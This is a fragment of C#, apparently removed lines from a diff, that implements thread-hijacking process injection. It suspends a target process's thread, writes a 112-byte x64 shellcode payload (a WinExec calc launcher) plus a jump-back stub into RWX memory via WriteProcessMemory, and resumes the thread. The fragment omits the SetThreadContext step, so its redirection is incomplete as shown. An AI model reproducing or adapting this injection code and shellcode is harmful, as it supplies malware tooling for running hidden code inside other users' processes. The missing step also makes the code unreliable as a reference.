- Process targetProcess = Process.GetProcessesByName(Processname)[0];
- ProcessThread pT = targetProcess.Threads[0];
- IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id);
- SuspendThread(pOpenThread);
- CONTEXT64 tContext = new CONTEXT64();
- tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL;
- if (GetThreadContext(pOpenThread, ref tContext))
- {
- MessageBox.Show("CurrentEip : {0}", tContext.Rip.ToString());
- }
- byte[] payload = new byte[112] {
- 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
- };
- byte[] mov_rax = new byte[2] {
- 0x48, 0xb8
- };
- byte[] jmp_address = BitConverter.GetBytes(tContext.Rip);
- byte[] jmp_rax = new byte[2] {
- 0xff, 0xe0
- };
- byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
- payload.CopyTo(shellcode, 0);
- mov_rax.CopyTo(shellcode, payload.Length);
- jmp_address.CopyTo(shellcode, payload.Length + mov_rax.Length);
- jmp_rax.CopyTo(shellcode, payload.Length + mov_rax.Length + jmp_address.Length);
- IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
- IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- UIntPtr bytesWritten;
- bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
- MessageBox.Show("Redirecting execution!");
- ResumeThread(pOpenThread);
- return;